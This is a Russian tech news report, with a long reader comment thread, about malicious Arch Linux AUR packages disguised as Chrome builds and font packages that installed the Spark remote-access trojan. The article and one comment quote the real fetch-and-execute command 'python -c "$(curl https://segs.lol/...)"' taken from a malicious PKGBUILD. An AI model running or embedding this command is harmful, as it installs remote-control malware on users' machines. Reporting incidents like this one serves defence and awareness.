The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

01.08.2025 21:56

В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда 'python -c "$(curl https://segs.lol/9wUb1Z)"', загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет google-chrome-stable был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления google-chrome-stable в AUR были загружены два вредоносных пакета - "chrome" и "chrome-bin", содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.

  1. Главная ссылка к новости (https://www.reddit.com/r/archl...)
  2. OpenNews: В AUR-репозитории Arch Linux выявлены вредоносные пакеты
  3. OpenNews: Релиз Aura 4.0.0, пакетного менеджера для Arch Linux
  4. OpenNews: Выпуск пакетного менеджера pacstall 5.0, развивающего аналог AUR для Ubuntu
  5. OpenNews: Эксперимент по получению контроля над пакетами в репозитории AUR
  6. OpenNews: В AUR-репозитории Arch Linux найдено вредоносное ПО
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63662-arch
Ключевые слова: arch, aur, malware
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (134) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 22:35, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    > python -c "$(curl https://segs.lol/9wUb1Z)"

    LOL!

     

  • 1.2, Аноним (2), 22:36, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +25 +/
    В AUR-репозитории выявлен безвредный пакет.
     
  • 1.3, Аноним (3), 22:49, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
     
     
  • 2.5, Аноним (5), 22:52, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    виноват в первую очередь сам пользователь

    Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.

    Ведь всю помойку тянут на ПК.. всю!

     
  • 2.48, Anonimm (?), 08:08, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Гениально! В винде вирусы и трояны устанавливаются из-под админа - "дырявая система", то же самое в лине - "но правда для запуска требуется рут"..
     
     
  • 3.88, Аноним (88), 12:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Надо ставить DrWeb
     
     
  • 4.100, Anonimm (?), 12:50, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Я о двойных стандартах. То, что винду считают дырявой, но если линь делает ровно то же, то это норма..
     
     
  • 5.130, Аноним (-), 16:18, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ты передёргиваешь. Линукс безопасен. Описанное в новости поведение вредителя на Windows OS делается вполне легально. Винда вполне легально делает скриншот твоего рабочего стола и отправляет его на свои сервера. И никто по этому поводу не возникает, потому что вредительство прописано в лицензионном договоре.
     
     
  • 6.145, кантикариус (?), 20:26, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –4 +/
    Не делает, если ты не захочешь. А если делает, то никуда не отправляет. У вас просто очень большие глаза. Это из-за плохих дешёвых экранов и трудночитаемых шрифтов.
     
  • 6.173, Anonimm (?), 06:58, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Поменьше смотрите телевизор и особенно Рен-ТВ..
     
     
  • 7.183, товарищ майор (?), 07:57, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    ты у меня - допереключаешься!
     
  • 6.188, Anonimm (?), 08:51, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Один вопрос. Какая взаимосвязь между трояном в репозитории (пусть и стороннем) для линукса и виндой? Я понимаю, что 4%-ное сообщество не хочет признавать факт, что безопасности в линукс ровно столько же, как и в любой другой системе, но причём здесь винда?
    Кстати, Android тоже вроде на лине построен (или уже нет и его упоминание невыгодно?) и тоже как винда устанавливает софт по одному нажатию, но "это другое", верно?
     
     
  • 7.192, Аноним (-), 10:16, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да всё ты понял Поведение Windows опередляется его разработчиками а не тобой Т... большой текст свёрнут, показать
     
     
  • 8.193, Anonimm (?), 11:24, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Которые внезапно оказываются перелицованным дебианом с исчезновением упоминания ... текст свёрнут, показать
     
  • 8.203, Аноним (203), 19:22, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так и поведение копилефтного GNU Linux опередляется его разработчиками а не тобо... текст свёрнут, показать
     
  • 8.215, L10N (ok), 11:12, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Можете развить эту мысль Чем они менее безопасны, чем не российские ... текст свёрнут, показать
     
  • 3.106, Аноним (106), 12:59, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Это - другое! ))
     

  • 1.4, Аноним (5), 22:49, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Так можно туннели бекдором до SSH кидать и компом чужим управлять..

     
     
  • 2.75, Аноним (75), 10:31, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –5 +/
    На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.
     
     
  • 3.101, Anonimm (?), 12:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?
    Да уж, уровень экспертности зашкаливает.. 😆
     
     
  • 4.107, olelukoie (ok), 13:20, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    М-да А если еще раз подумать В нормальных дистрибутивах open ssh-client s и ... большой текст свёрнут, показать
     
     
  • 5.118, Аноним (75), 14:49, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит)

    Против такого трудно что-то возразить. Ставьте, заходите. Только я бы при острой нужде подключился по RDP.

     
     
  • 6.210, Аноним (210), 10:52, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > подключился по RDP

    Ну конечно, передать команду из 15 байт это не нужно, а картинку надо надо...

    У вас виндовс головного мозга, юниксы в отличии от () никогда не отказывались от терминала, и он всегда оставался полноценным, и на десктопах и на одноплатниках, и на роутерах, которые одноплатники и есть, зачем городить огород, преобразования текста в изображение, а потом это транслировать в сеть, когда можно обойтись несколькими байтами.

     
  • 4.116, Аноним (75), 14:48, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

    Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер. В нормальном учреждении пользователи работают с определенным набором приложений. Всё. Об админах не говорим - там другое дело. Да, и админу нечего делать на компьютере пользователя через SSH.

     
     
  • 5.174, Anonimm (?), 07:00, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Уже бухгалтер? А сначала был домашний компьютер..
     
  • 5.211, Аноним (210), 10:57, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер

    Вас послушать, так надо капот на автомобили заварить автогеном, чтобы пользователь туда ни в коем случае не мог залезть. Ну может однажды так и будет, но после того как телефоны стали не разборными совсем - стало лучше? или просто добавилось геммороя по замене компонентов

     
  • 4.206, Аноним (203), 20:14, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

    Это ещё ладно, у меня на серверах в проде нет SSH. И ничего, небо на землю не падает.

     
     
  • 5.212, Аноним (210), 11:00, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В одном городе живет мальчик, у которого нет (подставить что угодно), и ничего, живет..

    Доказательство того, что (что угодно) не нужно.

     

  • 1.6, Аноним (6), 22:58, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    И что теперь делать?
     
     
  • 2.7, Аноним (7), 23:10, 01/08/2025 [^] [^^] [^^^] [ответить]  
  • +17 +/
    Читать пкгбилды аура перед запуском.

    Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

     
     
  • 3.49, Anonimm (?), 08:11, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Читать пкгбилды

    Нормальные системы ставятся через "Далее" и только в лине для установки программ нужно быть ещё и программистом..

     
     
  • 4.64, Аноним (64), 09:25, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Для быта Линукс даже не мёртв, а не зачат.
     
  • 4.78, Аноним (75), 10:40, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Разработанные мной программы под Linux ставятся, как Вы выразились, через "Далее" с помощью InstallJammer.
     
     
  • 5.147, кантикариус (?), 20:30, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что за программы? Хочу поставить. Хотелось бы получить полный список со ссылками.
     
  • 4.89, Пояснительная бригада (?), 12:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Так Арч не для домохозяек, а для опытных Линукс пользователей, с разморозкой.
     
     
  • 5.102, Anonimm (?), 12:53, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А вот и разделение на сорта подъехало..
     
     
  • 6.114, Пояснительная бригада (?), 14:41, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так зайди на офф сайт арча и почитай об этом! Писать все горазды.
     
  • 5.148, кантикариус (?), 20:37, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Я домохозяин. Несколько лет на Арче сидел. Ничем принципиально не отличается от Убунты, кроме того, что всё-таки нужно почитать мануалы и больше печатать в терминале. Да и то, это больше касается процесса установки, чем последующего повседневного использования. А так, что тот линукс, что этот на десктопе как на корове седло.
     
  • 4.90, Аноним (88), 12:06, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Установить антивирус.
    Во всех нормальных магазинах приложений для Андроид есть встроенный.
     
     
  • 5.103, Anonimm (?), 12:54, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Какая взаимосвязь между pkgbuild и Android?
     
     
  • 6.149, кантикариус (?), 20:39, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Прямая. Андроид - это линукс? Или нет?
     
     
  • 7.175, Anonimm (?), 07:03, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну когда линукс сообществу нужно показать свою особенность, то к линю начинают приплетать все подряд - серверы, роутеры, смартфоны. Но если находят уязвимость в вышеперечисленном, то сразу начинают говорить, что линь сам по себе..
     
     
  • 8.213, Аноним (210), 11:07, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вот когда найдут уязвимость во всех линуксах, тогда и приходите, а то что одни о... текст свёрнут, показать
     
     
  • 9.221, Anonimm (?), 12:49, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А вот и ботинки новые завезли 128518 ... текст свёрнут, показать
     
  • 6.168, Аноним (88), 23:13, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Прямая, магазин приложений обращается в репозиторий приложений (пакетов в любом формате), в котором осуществляется эвристический анализ.
     
     
  • 7.176, Anonimm (?), 07:05, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Эвристический анализ для установки программы?😆
    Да уж, снова убеждаюсь, что местным "экспертам" на "Почте России" нужно работать - впаривать пенсам макароны и консервы..
     
  • 4.199, Аноним (199), 19:08, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    бывает. иногда приходится понимать, что именно ты делаешь.
     
  • 2.16, НяшМяш (ok), 00:12, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
     
     
  • 3.150, кантикариус (?), 20:44, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Здесь есть чел у которого 493 правила для браузера в Никс Ось. Да ну обычный линукс-десктоп обычного линукс-пользователя.

    >на машину

    Как же мне нравится, когда вы называете свои коре 2 дуо и пентиумы МАШИНАМИ! :DD Респект!

     
     
  • 4.200, dannyD (?), 19:09, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    ну ты же называешь себя ЧЕЛОВЕКОМ!:DD Респект!
     
     
  • 5.209, кантикариус (?), 00:12, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > ну ты же называешь себя ЧЕЛОВЕКОМ!

    Где и когда я так се6я называл? Пруфы будут?
    Но вот очередной владелец МАШИНЫ детектед.

     
     
  • 6.218, dannyD (?), 11:32, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    AI бот детектед.
     
  • 2.26, Аноним (26), 02:33, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
     
     
  • 3.151, кантикариус (?), 20:48, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Сейчас ставить из AUR - это примерно как я зайду на дзен или на маил.сру и начну оттуда по ссылкам ставить софт на винду :D
     
     
  • 4.184, пох. (?), 08:06, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ты не поверишь, но большинство обычного софта на винду именно так и ставится.

    По ссылкам. Если не с мэйлру то с хабра. Откуда-то надо тебе узнать о существовании этого софта.

    И ничего ужасного, как правило, не произойдет, а об остальном одном проценте позаботится антивирус.

    И да, в том числе из-за подписей.

    А у вас - с одной стороны централизованный вреднозиторий, а с другой - полное отсутствие хотя бы видимости контроля за его содержимым.

     
     
  • 5.214, Аноним (210), 11:11, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >  Ты не поверишь, но большинство обычного софта на винду именно так и ставится.

    Лично тобою? ну, ок

    но вот мне кажется, что большенство софта залетают на компы через gpo, либо системы развертывания на заводе, там тоже качают по ссылкам с мейл-ру?

     
     
  • 6.222, Anonimm (?), 12:50, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Игры тоже на заводе устанавливают?
     
     
  • 7.226, нах. (?), 16:19, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Конечно! Он же на заводе по производству игорей заготовки пилит.

    Когда не устанавливает слесарям рач, конечно. (на том заводе у всех у кого не винда - рач, иначе б чего он какие-то gpo приплел)

     
  • 2.28, Bottle (?), 02:50, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
     
     
  • 3.50, Anonimm (?), 08:12, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Интересно, а для андроида и айфона они тоже исходники читают?
    Вспомнил - ведь "это другое".. 😆
     
     
  • 4.59, dannyD (?), 08:58, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    сходи на f-droid почитай.
     
     
  • 5.177, Anonimm (?), 07:07, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    На фдроиде в принципе не выкладывают исходники. Максимум - ссылка на проект автора..
    Ваша шутка не удалась, сударь..
     
     
  • 6.216, Аноним (210), 11:13, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    то есть ссылка на исходники на фдроиде ведущая на фдроид считается, а ведущая на гитхаб нет, а в чем разница то?
     
     
  • 7.223, Anonimm (?), 12:51, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > сходи на f-droid почитай.

    Не надо менять обувь на ходу..

     
  • 3.91, Пояснительная бригада (?), 12:06, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Потому-то здесь троллей и навалом, ибо не понимают разницы между виндой и дистрибутивами Линукс.
     
     
  • 4.104, Anonimm (?), 12:56, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > не понимают разницы между виндой и дистрибутивами Линукс.

    Как выяснилось - никакой..

     
     
  • 5.152, кантикариус (?), 20:51, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну нифига себе поклёп. На винде можно отдыхать и работать. А под жигулями только лежать.
     
     
  • 6.178, Anonimm (?), 07:09, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Имелась ввиду безопасность, которой в любой системе должен заниматься пользователь.
    Но 4%-ное сообщество убеждает нас, что уж их-то система безопасней той же винды. Данная новость показывает всем, что это далеко не так..
     
     
  • 7.217, Аноним (210), 11:18, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Мне вот интересно, а мезазойские амебы, если бы имели имели чуточку мозгов, тоже бы возмущались о том что не должны они отращивать ноги и бегать, ну типа просто лежать на камне и метаболизировать это же круто.
     
     
  • 8.224, Anonimm (?), 12:51, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Выходные удались, верно ... текст свёрнут, показать
     
  • 2.185, Аноним (185), 08:31, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Если вы пострадавший, то писать заявление в полицию. Если нужно, они подключат Интерпол.
     

     ....большая нить свёрнута, показать (42)

  • 1.10, freeperson (?), 23:30, 01/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
     
     
  • 2.14, Аноним (14), 00:04, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Гентушникам тоже ухо держать востро в отношении к оверлеям.
     
     
  • 3.32, 12yoexpert (ok), 05:29, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    разумеется, но:
    1) гентушников тупо меньше и оверлеи им нужны гораздо реже, чем AUR на арче, и для настолько специфичного софта, что пропихивать туда малварь тупо не окупится
    2) это гента со всеми вытекающими, поди заставь свою попсовую малварь там работать: у кого-то musl, у кого-то openrc, у кого-то, прости господи, шланг, даже версии питона у всех разные
     
     
  • 4.58, dannyD (?), 08:53, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >>гентушников тупо меньше

    это с какого пальца?

    может чем бубунтят и меньше,но с рачеводами я бы еще сильно поспорил.

     
     
  • 5.72, 12yoexpert (ok), 10:25, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да тупо судя по количеству попсовых пакетов. поди попробуй собери хоть один слайсер на генту, хоть оверлеями, хоть без

    мне пришлось вырезать половину месы, чтобы кура запустилась

     
     
  • 6.85, dannyD (?), 11:54, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >>да тупо судя по количеству попсовых пакетов.

    ошибка статистической выборки.

    ну не надо гентушникам это, я вот даже не знаю о чем вы, коллега.

     
     
  • 7.170, 12yoexpert (ok), 00:36, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    это софт для нарезки 3д-моделей в g-code команды для 3д-принтера
     
     
  • 8.202, dannyD (?), 19:14, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да я выяснил вопрос за 15 минут но 1 там есть аппимаг 2 подобный софт стави... текст свёрнут, показать
     
  • 6.140, Аноним (140), 19:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    куры нет в репе 24.04 LTS - я немного охренел от такого (в дебиане то все есть), пришлось собрать из более младшенького - работает... но вот от того куда скатился "самый человечный десктоп дистр" я немного удивился...
     
     
  • 7.190, 12yoexpert (ok), 09:46, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    у них же идеология "жрите снап-пакеты и не выпендривайтесь"
     
  • 2.24, Аноним (26), 02:16, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > AUR это та ещё помойка, где никто не проверяет ничего.
    > Вредоносный пакет был удалён администраторами AUR через несколько часов после появления.

    Держи в курсе.

    > ставьте Слаку или Gentoo, и будет вам счастье.

    Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1

     
  • 2.33, 12yoexpert (ok), 05:33, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    поддерживаю как гентушник, лет 7 сидевший на арче
     
  • 2.141, Аноним (141), 19:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.

    Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия отслеживания зависимостей пакетов.
    Думал про Генту или ЛФС, но там читать слишком много, я хоть и безработный на сегодняшний день, но времени на это не хватает.

     
     
  • 3.208, freeperson (?), 22:31, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия
    > отслеживания зависимостей пакетов.

    Есть в Slackware отслеживание зависимостей - slpkg, например. А когда оно не нужно, можно просто юзать sbopkg.

     
  • 2.153, кантикариус (?), 20:53, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Нужно сразу ставить LFS.
     
  • 2.201, Аноним (199), 19:10, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    если "никто" не проверяет "ничего" как появился инфоповод к новости?
    а?
    ну нашли же, да?
    а раз нашли, то, видимо, проверяли? не? )
     

  • 1.20, Аноним (20), 01:02, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
     
  • 1.38, Аноним (203), 06:07, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Чем это отличается от npm?
     
  • 1.41, Анониматор (?), 07:10, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Это всё Манждаро виноват. Понаставят pamac-aur и всё, считают что AUR это часть Арча, прозрачная установка "из магазина".
    Хотя уже много где в сети написано что они дурачье и не надо делать так. Но если кому-то нравится рисковать - это конечно ваше дело, но не надо свои проблемы триангулировать на всех
     
     
  • 2.46, ЖИРОПЕРДЯСТИК (?), 07:55, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –6 +/
    > считают что AUR это часть Арча

    Так убери у Арча AUR и он превратится в маргинальный дистрибутив, которым пользуются три калеки.

    А если AUR использовать, то это ЗверьCD скачай бесплатно без SMS.

     
     
  • 3.47, Аноним (47), 08:05, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ты назвал маргинальщиной такие дистрибутивы как RHEL с клонами и многими другими. Они тоже без епеля (ppa и т.д.) ничто. AUR скорее всего уйдет в тень, потому что тенденция всё недостающее ставить из флатхаба, а это по наполнению тоже как говорится "найди 3 отличия от AUR", так что Арч и тут не выделяется среди других "маргинальностью"
     
  • 3.154, кантикариус (?), 20:58, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Так убери у Арча AUR и он превратится в маргинальный дистрибутив

    Ерню полную сморозил. Гейб смотрит на тебя с жалостью.

     

  • 1.42, ЖИРОПЕРДЯСТИК (?), 07:10, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Да изначально было понятно, что AUR - это помойка. Любой Васян туда может прийти и понапихать бэкдоров в пакеты.
     
     
  • 2.52, Аноним (47), 08:16, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Таких васянов там сразу отлавливают, этот и полдня не продержался. Отличная работа
     
     
  • 3.77, Аноним (77), 10:38, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Не совсем. Поскольку у них нет премодерации пакетов от не пойми кого.
     
  • 2.94, Пояснительная бригада (?), 12:14, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Not a bug, а фича. Нормальный aur helper перед установкой любого пакета оттуда сначала показывает pkgbuild файл, а дальше всё зависит от прослойки между монитором и креслом.
     
     
  • 3.135, Аноним (203), 18:35, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Посмотри как в xz бэкдор всунули и подумай, поможет ли тебе чтение pkgbuild файлов.
     
     
  • 4.179, Anonimm (?), 07:11, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    "это другое", вы что.. 😆
     
  • 3.189, Anonimm (?), 08:57, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > нормальный

    Ты где "Этодругин" покупаешь? Сначала вы делите пользователей на сорта, потом начинаете ранжировать приложения по степени нормальности. А дальше что? Невозможность пользоваться линуксом вы будете "объяснять" монитором не того цвета у пользователя?

     

  • 1.45, Аноним (45), 07:44, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    А что ваш там pip или npm прям безопасны да? Или PPA Ubuntu?
    Берешь себе за правило - изучать каждый PKGBUILD и всё, проблема решена!
    Собственно, по мимо администраторов, юзеры тоже могут проверять PGBUILDы и указывать на нарушения. Ну и не хрен ставить все подряд, не думая и не проверяя, такой подход угробит любую ОСь, хоть даже винду, мак или андроид.
     
     
  • 2.53, Anonimm (?), 08:18, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > изучать каждый PKGBUILD

    А потом удивляться, что вас всего 4%..

     
     
  • 3.81, Аноним (75), 10:51, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > вас всего 4%

    Нас даже официально 5%. Не считая суверенных установок, которые используются во всем мире, а не только в РФ, "как думают некоторые студенты", и вряд ли попадают в данную статистику.

     
     
  • 4.156, кантикариус (?), 21:02, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Где вас 5%? Всё изворачиваетесь. Идите ещё снова Андроид посчитайте. Как было ~1,5%, так и есть.
     
     
  • 5.180, Anonimm (?), 07:14, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Если линукс сообществу нужно заявить о себе, то приплетают все - серверы, роутеры, смартфоны, умные телевизоры с холодильниками и утюгами..
    Но если в этом всем находят уязвимость, то линукс "вдруг" становится самим по себе, без фенов и пылесосов..
     
     
  • 6.197, кантикариус (?), 18:28, 03/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    На Стиме недавно снова посчитали. Менее 3% у них получилось. Это вместе со Стимдекой!
    Причём, доля снижается. Видимо, лохи "Линукс для игр" под давлением реальности заканчиваются.
     
  • 6.219, Котофалк (?), 12:25, 04/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А давно на фенах и пылесосах AUR?
     
  • 3.121, Пояснительная бригада (?), 15:01, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Тебе надо 146%?
     

  • 1.63, Аноним (63), 09:13, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А ведь в убунтовском launchpad ppa не меньше, или даже больше малвари от ноунэйм авторов. А в aur то не бинари, а pkgbuild, что как бы позволяет увидеть подмену.
     
     
  • 2.87, Аноним (87), 11:58, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > А в aur то не бинари

    Говоришь так, будто бы их там нет...

     
     
  • 3.119, Аноним (26), 14:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Для тугодумов разжую. PKGBUILD это простой bash скрипт, даже если пакет собирается из бинарников, в этом скрипте находятся ссылки на источники с которых эти бинарники качаются. Никто не мешает заглянуть в PKGBUILD (хоть через вебморду) и убедится что файлы качаются с официального сайта/репозитория.
     
     
  • 4.158, кантикариус (?), 21:05, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    убедится что файлы качаются с официального скомпрометированного гитхаба.
     

  • 1.67, Аноним (67), 09:37, 02/08/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Достаточно не ставить свежие пакеты из аур.
     
     
  • 2.73, 12yoexpert (ok), 10:26, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    это арч, там в принципе нет несвежих пакетов
     
  • 2.159, кантикариус (?), 21:07, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И начать ставить несвежие. Из AUR :D
     
  • 2.166, Аноним (166), 22:52, 02/08/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Лол, что, это реальная защита такая?

    Линус фанаты продолжают нести и не расплескивать.

